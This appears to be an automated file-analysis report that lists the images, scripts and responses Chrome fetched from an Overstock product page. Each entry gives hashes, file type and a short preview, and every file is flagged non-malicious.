                                                                                                                                                                                    Preview:......JFIF..............................................................................*................................................................*...... . .."..........8.......................................................................W....`ff...34..03..L.....s..g9.f.A..p..|.9..Y..f`f..L:.,\.5.....M......X.]N..o..r!T..`.h.OC.VUf...._.......0...N..& .@.......q..8.....7...`s...,.....8'y....R!..b..DVxx...wp).u...8R1....s.m.Vf}...g!.f.kz.303..f..s....sR..h5..s.......k|1..c.sJkY...h=,....:...[..~..)X4.G.UN..j.....S..F..].]P..Q~z.{*.[..X..bR.F7cKoV....YY5.N...wlw...4....a.Y....6.=.........Z!Q...."........2...x.2..o...Krk.^f}...=`'.....k3A....Y.:k3A...w.g...g...1.3...0w..N..C..{^...k......\.&.J%..H.i..........9.u.Y...G...I\...f.]C.M............t.4......`.Hl..=.z.A...#<.O..\t.,..J.J..TAYW..>-yP[....`I...m...OU.g.|nk|.9...|.p.^t=.q.7...Y..9..'.!.v.g..k..4..s5..SH.U. .4.!hT.....A5&:.PG....Yn...D....L..x.=6......h.........DoK.s.!.5X..-...
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (12736)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):13165
                                                                                                                                                                                    Entropy (8bit):5.228433053463398
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:+O3pHufbPUCpEcrbCpg68vhtz91LO7sgBy70nZbPkks3ZXF1vh3rg1Q5l8hY6o3+:+dACfCghtzb0tnByHVh3s1Q5l8hY+
                                                                                                                                                                                    MD5:BBC0C074C0ACA152EDBBE8CA4AF98C13
                                                                                                                                                                                    SHA1:5EE98D09E65221F52048D548117CED053B4CE9DB
                                                                                                                                                                                    SHA-256:86BEEDAEB8A869E813342EE2463F64A1F3F65E28DA53274DACD1BE8259A3B8DF
                                                                                                                                                                                    SHA-512:F7BCD3B6421C4C8540211DF50A40F8258F2119F2C07B779E4BFF625FF7711EAEFA4EF559B9B161B170060238DDA88355EC991B4BA187C4BA135284DDB181570B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://kit.fontawesome.com/541968e6a0.js
                                                                                                                                                                                    Preview:window.FontAwesomeKitConfig = {"id":49400478,"version":"6.6.0","token":"541968e6a0","method":"css","baseUrl":"https://ka-f.fontawesome.com","license":"free","asyncLoading":{"enabled":false},"autoA11y":{"enabled":true},"baseUrlKit":"https://kit.fontawesome.com","detectConflictsUntil":null,"iconUploads":{},"minify":{"enabled":true},"v4FontFaceShim":{"enabled":true},"v4shim":{"enabled":true},"v5FontFaceShim":{"enabled":true}};.!function(t){"function"==typeof define&&define.amd?define("kit-loader",t):t()}((function(){"use strict";function t(t,e){var n=Object.keys(t);if(Object.getOwnPropertySymbols){var r=Object.getOwnPropertySymbols(t);e&&(r=r.filter((function(e){return Object.getOwnPropertyDescriptor(t,e).enumerable}))),n.push.apply(n,r)}return n}function e(e){for(var n=1;n<arguments.length;n++){var o=null!=arguments[n]?arguments[n]:{};n%2?t(Object(o),!0).forEach((function(t){r(e,t,o[t])})):Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(o)):t(O
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 28x28, segment length 16, progressive, precision 8, 805x447, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):12774
                                                                                                                                                                                    Entropy (8bit):7.815221994744966
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:192:2M5mkn63+INjTFZN0k4ksMF7tMCBtZe4AlbjEwnZ+x3u936Ijy/x6ChD:t63JNTjNnDsStZeNlvE+Ixe9zm/xdD
                                                                                                                                                                                    MD5:3EF3A392DB056D8B8DD2DBCB367C1C8D
                                                                                                                                                                                    SHA1:C6ECF873269C42360188C75FC1E8717EF3F966CD
                                                                                                                                                                                    SHA-256:800C685BC29CCB5C6858AE3A59965C5B664501A4732E18B6DB17D261A2111CD8
                                                                                                                                                                                    SHA-512:FDE7F32CBF81036BA8D766C62AB890F42BC5372C6CFD578D2BEDB0CD8F0D38A6BA8279E3AB59E97A38EF306138298E12AC6A2B28B8A364B4279154CB9C5B2078
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF..............................................&.#. . .#.&.:.*.-.*.-.*.:.X.7.@.7.7.@.7.X.N._.M.H.M._.N...n.b.b.n...........................C.C..................................&.#. . .#.&.:.*.-.*.-.*.:.X.7.@.7.7.@.7.X.N._.M.H.M._.N...n.b.b.n...........................C.C..........%.."..........2....................................................................................._3..+a..+6J..Vl+p..3B.N~..y.............h...U...1.:{...|.......C..s......J.hR..&....O0......................u...DL....-.LIx.....8w.....Qi..J*GKR.....Q.<.........7|.e.O.._j.{...1t........<......................9..x.J.K$Vd^$R....{.._#7=.)i.ZJo.D.h.&-n}.?Vm..7..3.....zV...........\.z...X.3...k..cg=.....ts..................0..1...c.N.....yv=:.....9....L..9qR...=.=.Y8..d..S.$u..#=..O.>.W.......6J../.j.|...g.....Z3.~kW.g...~_R>...._(....................8.}.;........}.m..oi.......'.......d>wW...|.......Q>e=Y....W..+1..@..../....;.!........L\"..n.u..."/.n..#..s;.>...............
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Unicode text, UTF-8 text, with very long lines (64223), with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):64225
                                                                                                                                                                                    Entropy (8bit):5.400240587840965
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:768:oWNdihmAfqBiu8OGHWca5UGdTMRe5v5W8KKGnsjixgV15pD6N7da6eIUJLIaz:R6sgdXe5v5jDGsjiGV20NL1
                                                                                                                                                                                    MD5:D91BD1A51AF7C9D61F9713512DCD804A
                                                                                                                                                                                    SHA1:08BE0DD5CDF81852077768D225A2964AD4759518
                                                                                                                                                                                    SHA-256:A5CCDB0DE8A7D4BB22391DEBB05E6C98C57DE3B51EA973809EE56ADE2229EB69
                                                                                                                                                                                    SHA-512:6B5D63BFD0DDB19FF0548571D7CC97915F7E4E356B5A64F4045301B0B3B39B69CE0220C1E842EFA530DF5286C9713886FE36A84D800316E5857118AD212E6C94
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:(window.__LOADABLE_LOADED_CHUNKS__=window.__LOADABLE_LOADED_CHUNKS__||[]).push([[1],{113:function(e,t,r){"use strict";var n,i=(n=r(1))&&"object"==typeof n&&"default"in n?n.default:n,a=r(8),o=Object.assign||function(e){for(var t=1;t<arguments.length;t++){var r=arguments[t];for(var n in r)Object.prototype.hasOwnProperty.call(r,n)&&(e[n]=r[n])}return e},l=function(e){var t=e.checked,r=e.children,n=e.dataTracking,a=e.id,l=e.inputClassName,s=e.labelClassName,c=e.labelText,u=e.name,f=e.onChange,d=e.type,p=e.value,h=e.wrapperClassName;return i.createElement("div",o({className:("cl-"+d+"-wrapper "+h).trim()},n),i.createElement("input",{checked:t,className:("cl-"+d+"-input "+l).trim(),id:a,name:u,onChange:f,type:d,value:p}),i.createElement("label",o({className:("cl-"+d+"-label "+s+" "+(c?"cl-"+d+"-margin":"")).trim(),htmlFor:a},n),r,c))};l.propTypes={checked:a.bool,children:a.node,id:a.string,inputClassName:a.string,labelClassName:a.string,labelText:a.oneOfType([a.node,a.string]),name:a.string,
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:Java source, ASCII text, with very long lines (3362)
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):3363
                                                                                                                                                                                    Entropy (8bit):4.577882356233035
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:QwmfOLl8vBkPlkVTDoZbcd3/jk2bZc7eZeAvn:hmWlMBkPlkVTDoFKPgmu7eZfn
                                                                                                                                                                                    MD5:39D8E4045EA74D995643C5FE86109B64
                                                                                                                                                                                    SHA1:683D9D7825F79D7DB5959CA3A8946323F39DE101
                                                                                                                                                                                    SHA-256:6058310D39441415A341D4DD6977AE5ACC8B6DA7F6C7C8912EB6A0704EBCEB7F
                                                                                                                                                                                    SHA-512:418473728286E77F5CA85E2A62EB663A86C36A6D81609552939EAA0A4FA151BFA56E3019E6359035DB38B1C9DF2F7F4C8CA475490C0D0F891EC3B21C18E26073
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://cdn.shopify.com/shopifycloud/checkout-web/assets/c1.en/ShopPayLogo.MmDQrsit.js
                                                                                                                                                                                    Preview:import{ac as c,ad as t,a as h,ae as m}from"./app.DfgMZONA.js";const o="_8ssCG",v="zS4x6",d="PrlUn",r="SsCEp",p="aTkbO",s={xsmall:o,small:v,medium:d,large:r,inline:p},z=a=>c("svg",{xmlns:"http://www.w3.org/2000/svg",fill:"inherit","aria-hidden":"true",preserveAspectRatio:"xMidYMid",viewBox:"0 0 341 80.035",...a},c("path",{fillRule:"evenodd",d:"M227.297 0c-6.849 0-12.401 5.472-12.401 12.223v55.59c0 6.75 5.552 12.222 12.401 12.222h101.06c6.849 0 12.401-5.472 12.401-12.222v-55.59c0-6.75-5.552-12.223-12.401-12.223zm17.702 55.892v-14.09h8.994c8.217 0 12.586-4.542 12.586-11.423s-4.369-11-12.586-11h-14.788v36.513zm0-31.084h7.664c5.319 0 7.932 2.154 7.932 5.758s-2.518 5.758-7.695 5.758h-7.901zm31.796 31.833c4.417 0 7.314-1.92 8.644-5.196.38 3.65 2.613 5.523 7.457 4.26l.048-3.886c-1.948.187-2.328-.515-2.328-2.528v-9.55c0-5.617-3.752-8.94-10.686-8.94-6.84 0-10.782 3.37-10.782 9.08h5.32c0-2.714 1.947-4.353 5.367-4.353 3.609 0 5.272 1.545 5.224 4.214v1.217l-6.127.655c-6.887.749-10.686 3.324-10.686
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4724), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):4724
                                                                                                                                                                                    Entropy (8bit):5.328172600275533
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:ymki6KoVDicZwrdAmw2Iw2KCpPOzOcKQa+sC:4Wr6mw2Iw2KsPOqdDC
                                                                                                                                                                                    MD5:4CCF43771E48481ABCD9B2BCBDBD27ED
                                                                                                                                                                                    SHA1:94E18935A8B2E9BD8208B9C4C16751B49908DAEF
                                                                                                                                                                                    SHA-256:3CA9E609EF3F582AEC6955E30DE3EA1A0A33186BF6B10105D9E8391C4BA8AD21
                                                                                                                                                                                    SHA-512:2247C0CD89A6110AAED3086C3F5C277D8B1984337DF18B39AB09DA2CAE994DD4CCCBD44063EC7FA4FBFE7855A646403AB880670D1DA88FF8389E32717D1E460B
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://tags.creativecdn.com/C9KNyqKr4X0O06YxonxD.js
                                                                                                                                                                                    Preview:(async function(){const a="rtbhEvents",b="__rtbh.",c=["uid","sid","aid","eid"],d=[...c,"lid"],e=31536000000,f=[];if(Array.isArray(window.rtbhEvents)||(window.rtbhEvents=[]),window.rtbhEvents.length&&!window.rtbhEvents.push.prototype)try{function g(a){return!!a&&new Date(a)<new Date}function h(){return new Date(new Date().getTime()+e).toISOString()}function i(a,b="ams"){return null===a?void 0:function(c,e,f=null){try{const g=e.filter(a=>!d.includes(a.eventType)&&"init"!==a.eventType);return k(`https://${b}.creativecdn.com/tags/v2?type=json`,{method:"POST",mode:"cors",credentials:"include",referrerPolicy:"no-referrer-when-downgrade",headers:{"Content-Type":"application/json"},redirect:"follow",body:JSON.stringify({...j(a,f),tags:[...g,...z]})},c)}catch(a){}}}function j(a,b=null){const c=document.referrer?document.referrer:"";return{v:"v0.1.9",sr:c,su:location.href,th:b?b:a}}async function k(a,b,c,d){try{const e="function"==typeof c?c:()=>{},f=await fetch(a,b),g=f.status;if(200<=g&&300>g)
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPCM), density 56x56, segment length 16, progressive, precision 8, 1610x894, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):246463
                                                                                                                                                                                    Entropy (8bit):7.988667910575441
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:6144:yS0XyvuBzfifuH8wzSnxn0/9k7JeJMNXYZzyUQaydMJavYS3s:yWvuBzfiGHHzSnxn0M5XzUQaydVvY5
                                                                                                                                                                                    MD5:09E5468C79A583309A4869EA058B87D3
                                                                                                                                                                                    SHA1:14090874BD4F762968F4084C5F6BBA72B2620F9E
                                                                                                                                                                                    SHA-256:F097964FA92AD6A02331BB944CA944B4628745779155D1C8EB58B879914A843F
                                                                                                                                                                                    SHA-512:9BBB7FD38CF2A4DABAC7DB471ABB88F6F280838F4D7941DF515DBF1C0B82E740EB62673C15F16E8936ACC8D716FFA90E4301D9CB5DB2AFFB0493B90E44AFD295
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:......JFIF.....8.8............................................!...!.1&""&18/-/8D==DVQVpp.......................................!...!.1&""&18/-/8D==DVQVpp.......~.J.."..........5..................................................................>w_'..E..C.u.....*..>yg..m~..=(..............k..<_z~.....4...]..s................../....k=4.|.z\~[....._U^Y...y.....W..n=.r/....e.Z....."...=1..I.N..N...Mz..........=..C.O8K.g....;...._.?G..d.k.2HI!$....e./.i..&RHI!$...H|.._=..\.$..BI.|.......z}W....Tk....<.._n...G/N..|.O..k.>.........I...%.E.v.....#:...k3...%....~..xL...?..p.|..).y./.?..M>.|n.ap...wu@.<.:f.=..D...i.=.<}....NmNO....X5........~[...>\...=............_...y:..$.!".@.l)V~,....y$*]..J%v.,.de(..t7....1.s..Kt..hk..[.V..{..D.....Nc+64.h...s.......=..n>.........[:...]..Y...t.Z9..%c...J..@...!r...e..m..(...._....<..I..+$...HI!>9.?....I.$...HI!$...>'..FI.HI!$.......o..+....|........w.Ok.|/...?3|.z._...u...g...]...5.....VO]..../2..G..Z...d.......?nW.
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1314
                                                                                                                                                                                    Entropy (8bit):6.43819852412672
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:bATCIl/X2YlXWI2PUu2wJdPwQ9Jg7sum6v:bFIl/Xfl82w9MTpv
                                                                                                                                                                                    MD5:C102EA7F98AEFAFF318615B4E6B87E4D
                                                                                                                                                                                    SHA1:026EAFF9FDC82F97792814A9DD4D2B1175E24EF9
                                                                                                                                                                                    SHA-256:E502DE9C6534409D2064624BB3FF9C803276DC6B1FF1BCE6DB91A3DDF13665EC
                                                                                                                                                                                    SHA-512:77AEA4ACB9C3BD2B97FBEA72FD12015D584AFB9A39450F26A50ED99A111D89BD66CA26E315F29BD6056ED74A1A1D5E966AD5BC2EFB8C6F3658A67976B392FF58
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_111ca84b-e00f-4eba-b73a-4f8090bcba3b.jpg?v=1729322908&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ....p....*P.P.>1..B.!!.... ....i.......m:/@.'.+.....W|..$..y..q................^O1..7...M.)C5`.W|...;<U^R..."u.:............. ..A.w:..~....C....(.....Hf...W$.U..\...A},:...K......S.7$Yu;..Z..X.....-.4|VX.m.M...2.].:..]..^.....LV.......Gm..........0`/.....F...c<U...".Z/,.n.....Es.A.F(.....XU0.[..o-.`........OX.I@../..:...I`l............d.....n.D.....[....p..)..i..Qa.>....}...;.s......l...S...;..K.>.i'......R......$.o..O9......LZ....;h.-a5|l8tM.^..........\q...}....y.......f.#..40D.]c.%S=yo|i..
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (34889), with no line terminators
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):34889
                                                                                                                                                                                    Entropy (8bit):5.165062606043757
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:384:UktRjhfL7+m82RrIbPrf+V67vgJ7jZXRilpgher1pSrcilLcYrxwfLbPXaglRRkO:Rtv82mj9lpgo1ZelalPgNr0lQv4
                                                                                                                                                                                    MD5:9ED1700DA5A1D318C463C419F1677893
                                                                                                                                                                                    SHA1:907D3CC8AA3617F8B71228ED16AD638BC13103B2
                                                                                                                                                                                    SHA-256:A376B6ED2F74F43BC28924E50344DFC684875CCB082016E97AA88A2698311FDE
                                                                                                                                                                                    SHA-512:B35C04B1623EBE789624F70A73B66134D9C1EF6AA468A59EF8AE12D2363BCC855A3C4CD766675D2F7B9807D360A93EB6DDDC3575224212EE6C68EC4C498BB87E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://g.3gl.net/jp/713/v3.3.4/M
                                                                                                                                                                                    Preview:var __extends=this&&this.__extends||function(){var n=function(t,i){return n=Object.setPrototypeOf||{__proto__:[]}instanceof Array&&function(n,t){n.__proto__=t}||function(n,t){for(var i in t)Object.prototype.hasOwnProperty.call(t,i)&&(n[i]=t[i])},n(t,i)};return function(t,i){function r(){this.constructor=t}n(t,i);t.prototype=i===null?Object.create(i):(r.prototype=i.prototype,new r)}}(),PostType,DataWrapper;(function(n){n[n.OnLoad=0]="OnLoad";n[n.OnBeforeUnload=1]="OnBeforeUnload";n[n.OnAbort=2]="OnAbort";n[n.Flush=3]="Flush"})(PostType||(PostType={}));DataWrapper=function(){function n(){this.hasErrors=!1;this._appErrors=null;this.hasIndicators=!1;this._indicators=null;this.hasTracepoints=!1;this._tracepoints=null}return n.prototype.addError=function(n,t){this.hasErrors||(this._appErrors={},this.hasErrors=!0);this._appErrors[n]=t},n.prototype.getErrors=function(){return this._appErrors},n.prototype.addIndicator=function(n){this.hasIndicators||(this._indicators={},this.hasIndicators=!0);f
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):19
                                                                                                                                                                                    Entropy (8bit):3.576617644908667
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:PFBwn:9Sn
                                                                                                                                                                                    MD5:980021208D52C1907A8256F57F077691
                                                                                                                                                                                    SHA1:CC2EF6376333CDFB4E18210689B4FFAE4FD60C39
                                                                                                                                                                                    SHA-256:B5865D15F4439D43678F8F1165CA58106C42C0F1AFF9419DFC642FA4DCDAC269
                                                                                                                                                                                    SHA-512:ABC045334B3A69A098E0D5AC0F391F389350432E8090C379829C3E7722FB991CC19E1F419CF3A150FC8A9351D359C0C6944AE2D782FFE7C24A4B4027A6111028
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:RBAC: access denied
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                                                    Category:downloaded
                                                                                                                                                                                    Size (bytes):1302
                                                                                                                                                                                    Entropy (8bit):6.433762132223904
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:YTCIl/X2YlXWI2PUjPqCIIfWSHDhQ/xmxMgDB5D0a6:NIl/XflRZIIOSHtpagDPgX
                                                                                                                                                                                    MD5:517FFC69B7002D1DEC4A5300E7DD72EC
                                                                                                                                                                                    SHA1:7557013ED5F68C0065BB16BC3578AA1B91AA15CE
                                                                                                                                                                                    SHA-256:FAC72F74504B57608166F2B93C5555DC2F4AFE340E4B5808907E2F6B8F0DC768
                                                                                                                                                                                    SHA-512:AAB4C7ED77C05E44F6315A6BF3E0607938721F0CED5525A16786B0E7F41D3BEA0EBD4A0A4C786AC3262639A176AFFD22CF9F7001AF7EF373CF321EAB03229CAA
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    URL:https://www.overstock.com/cdn/shop/files/Mia-Oversized-Modular-Sectional-Fabric-Sofa-Set_4060a6bd-6246-411e-8c6c-52e3cc9fdbe0.jpg?v=1729325166&width=80
                                                                                                                                                                                    Preview:RIFF....WEBPVP8X....(...O..O..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 ~........*P.P.>1..B.!!... ....i.@e.......U_...?.N...w.?`.W...R.*....\..nv.....}.j.+...8.u......A...+.;...VK...2...q..3....... ...'..0....].......e.;......\..........z...s.E.....{.:.z\..6.k..1..N.....iL7T..!/...b.{.k......{[@:...f...Lw..T....2ig...<~....`fG.:......kDv......k>>.tf..40..1y...S.........I.g..5.L..a6...[...N..x......'.o..oX.y.Q....#&?...`...}E........2V(...c....f..k...2c#].O.C.....G...*...s.E.... ...S.7....<.V....3..40v.W.$....W..@.G.A.Wx!..^..."...c.m.o._..i.............x..$k.....~~...-s(..-
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:ASCII text, with very long lines (4544)
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):4642
                                                                                                                                                                                    Entropy (8bit):5.118788119437289
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:96:RHEdhTMJS9hW/5NOAh04v0pVsPRA5N72hY7PNGAl8Lcvp:RkdhcS94/5nh04+sS5ZPNGAlycR
                                                                                                                                                                                    MD5:FFE2F01879E5BAB4340780AA3DB14C47
                                                                                                                                                                                    SHA1:560500466B1A32D05D644B22FB4139CCC61C54B8
                                                                                                                                                                                    SHA-256:EAF91AE4532B49AEE87C7AA304D6F0E8FBC964CD3649BE237BB10EFA381A6F0A
                                                                                                                                                                                    SHA-512:17B00FA4991877B3F59CE9565B5AFC99CD7EAAA3D71AD7C3CE430DCEB9E21E08F8E41E0B83460C11022415654D640242BE86539E9A75053B83D79E8B218A8FDB
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:if(!customElements.get("product-form")){class ProductForm extends HTMLElement{constructor(){super(),this.hasChildNodes()&&this.init()}init(){this.form=this.querySelector(".js-product-form"),this.form&&(this.form.querySelector('[name="id"]').disabled=!1,this.cartDrawer=document.querySelector("cart-drawer"),this.submitBtn=this.querySelector('[name="add"]'),this.checkoutBtn=this.querySelector('[name="checkout"]'),this.goToCheckout=!1,theme.settings.afterAtc!=="no-js"&&this.addEventListener("submit",this.handleSubmit.bind(this)),this.checkoutBtn&&this.checkoutBtn.addEventListener("click",()=>{this.goToCheckout=!0}))}async handleSubmit(evt){if(evt.target.id==="product-signup_form"||(evt.preventDefault(),this.submitBtn.getAttribute("aria-disabled")==="true"))return;theme.settings.vibrateOnATC&&window.navigator.vibrate&&window.navigator.vibrate(100),this.errorMsg=null,this.setErrorMsgState(),this.submitBtn.setAttribute("aria-disabled","true"),this.submitBtn.classList.add("is-loading"),this.ch
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:GIF image data, version 89a, 1 x 1
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):24
                                                                                                                                                                                    Entropy (8bit):2.459147917027245
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:3:CUXJ/lH:Dl
                                                                                                                                                                                    MD5:BC32ED98D624ACB4008F986349A20D26
                                                                                                                                                                                    SHA1:2D3DF8C11D2168CE2C27E0937421D11D85016361
                                                                                                                                                                                    SHA-256:0C9CF152A0AD00D4F102C93C613C104914BE5517AC8F8E0831727F8BFBE8B300
                                                                                                                                                                                    SHA-512:71ACC6DA78D5D5BF0EEA30E2EE0AC5C992B00EFEC959077DFE0AB769F1DBBD9AF12D5C5C155046283D5416BEB606A9EF323FB410E903768B1569B69F37075B4E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:GIF89a.......,..........
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:SVG Scalable Vector Graphics image
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):1025
                                                                                                                                                                                    Entropy (8bit):4.426331260574637
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:24:tYU/duXMMDg50TVkG7dbcniIq6aOTNUhfLrRdk2:n/gIokGZbPz6hTNUhfLrZ
                                                                                                                                                                                    MD5:9E457B7B5C8D299B8CF3E0308E0F705A
                                                                                                                                                                                    SHA1:18E0127E7CB323492C66F5C50C94AB0793588A11
                                                                                                                                                                                    SHA-256:40DA66365AB40CDDBE064DB3F4A46F850240489D49CB859EE7387A86A4B2EEB5
                                                                                                                                                                                    SHA-512:63083E31F697C563565043AB65BBD720F07CE1C0382F18F747685534E947BE6767A8D7235FCC0D9BB88548F37208FF5924C771EFF213CA62B0886F0EAA8E5939
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
                                                                                                                                                                                    Preview:<svg width="24" height="24" viewBox="0 0 24 24" fill="none" xmlns="http://www.w3.org/2000/svg">.<path fill-rule="evenodd" clip-rule="evenodd" d="M9.501 3.942C9.21599 3.68616 8.78401 3.68616 8.499 3.942L3.499 8.43032C3.34053 8.57258 3.25 8.77549 3.25 8.98844V19.5001C3.25 19.699 3.32902 19.8898 3.46967 20.0305C3.61032 20.1711 3.80109 20.2501 4 20.2501H9H9.5H19C19.4142 20.2501 19.75 19.9143 19.75 19.5001V8.98844C19.75 8.77549 19.6595 8.57258 19.501 8.43032L14.501 3.942C14.216 3.68616 13.784 3.68616 13.499 3.942L11.5 5.73643L9.501 3.942ZM10.3773 6.74428L9 5.50797L4.75 9.32304L4.75 15.5001H8.25V8.98844C8.25 8.77549 8.34053 8.57258 8.499 8.43032L10.3773 6.74428ZM4.75 18.7501L4.75 17.0001H8.25V18.7501L4.75 18.7501ZM9.75 18.7501V17.0001L18.25 17.0001V18.7501H9.75ZM18.25 9.32305V15.5001L9.75 15.5001V9.32304L14 5.50797L18.25 9.32305ZM14 9.50012C14.5523 9.50012 15 9.05241 15 8.50012C15 7.94784 14.5523 7.50012 14 7.50012C13.4477 7.50012 13 7.94784 13 8.50012C13 9.05241 13.4477 9.50012 14 9.50012Z"
                                                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 80x80, components 3
                                                                                                                                                                                    Category:dropped
                                                                                                                                                                                    Size (bytes):2454
                                                                                                                                                                                    Entropy (8bit):7.086718111816217
                                                                                                                                                                                    Encrypted:false
                                                                                                                                                                                    SSDEEP:48:NBIl/XflVxiQPANq65o5RfZ89oMZf1EZhphM+JogadCcSXcHXR+m3:NBIl/XrxyNRoBWrErphLoZSXm+O
                                                                                                                                                                                    MD5:04326D010F268F0B1162ADAFC6F36906
                                                                                                                                                                                    SHA1:79A2EE23B07F92A6E14C3A421F69C1FC80C6A6D2
                                                                                                                                                                                    SHA-256:2707870FBAB3F519E0C45687E319AC078322845711A3BA1EDED2410F2D7304EC
                                                                                                                                                                                    SHA-512:9B6080CC3E850CE3DE765D82CCABCDD8E2678CDB1124A0C8FBED39032AA8BD19DCCCC4422511AB409B440DF0C09FDB0D55F73BF10A2B3B376E2E8A592C78386E
                                                                                                                                                                                    Malicious:false
                                                                                                                                                                                    Reputation:low
